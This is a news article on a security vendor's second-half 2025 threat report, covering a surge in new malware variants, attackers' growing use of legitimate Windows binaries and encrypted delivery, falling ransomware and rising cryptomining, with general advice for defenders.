WatchGuard: New Malware Variants Surge 1,500% in H2 2025

A new report from WatchGuard Technologies reveals that unique malware detections on endpoints skyrocketed by 1,548% in the second half of 2025, even as overall malware volume dipped slightly. 

Internet Security Report findings suggest threat actors are bypassing traditional defense

The findings, published in the company’s H2 2025 Internet Security Report, highlight a sharp pivot in attacker tactics toward stealthier, more evasive techniques, including a heavy reliance on “living-off-the-land” (LotL) attacks.

According to the report, total endpoint malware detections fell about 4.6% in H2 2025. But that headline masks a deeper shift: new and previously unseen malware variants surged significantly, especially in the fourth quarter.

The spike suggests threat actors are investing in new, customized malware strains designed to bypass traditional defenses. Nearly 23% of malware detected during the period evaded signature-based tools entirely, requiring more advanced behavioral or AI-driven detection to stop it.

Living-off-the-land takes center stage

Attackers have also changed their delivery methods. For years, malicious PowerShell scripts were the go-to tool for hackers. 

Now, they are increasingly using LotL tactics, where they hijack legitimate Windows binaries that already exist on your computer to blend into normal activity and avoid detection.

By the end of 2025, Windows binaries became the top malware vector on endpoints. Because these files are “inherently trusted” by the system, hackers can hide in plain sight.

This change underscores a growing challenge: when attackers use legitimate tools already present on a system, distinguishing between normal and malicious behavior becomes significantly more complex.

Encryption continues to provide cover for attackers. Malware delivered over encrypted TLS connections remained high, accounting for 96% of blocked threats. 

More concerning, evasive malware detected over TLS jumped nearly 2,000% during the reporting period.

The data suggests attackers may be relying less on brand-new exploits and more on repackaged or obfuscated versions of known threats.

Ransomware falls, cryptomining rises

On a positive note, network-based attacks slowed, with Intrusion Prevention Service (IPS) detections dropping 28% per Firebox. Ransomware extortion events also cooled significantly, declining by 68% over the course of the year. However, security professionals are warned not to mistake this dip for victory. 

As commodity malware becomes easier to license on the dark web and automated AI-powered attacks emerge, the entry barrier for new criminals has never been lower.

Meanwhile, crypto mining malware is back on the rise, reaching highs not seen since the beginning of the year as a “popular and easy way to monetize infected victims.”

Why this matters

Taken together, the findings point to a stealthier but more sophisticated threat environment. Attackers are focusing less on volume and more on stealth, encryption, and legitimate system abuse.

For defenders, visibility is everything. Enabling TLS inspection, hardening endpoints against LotL abuse, and deploying behavioral analysis tools are no longer optional; they are the only way to navigate the fog.

MSPs and MSSPs will need to build their own defenses while also guiding customers through increasingly sophisticated threats.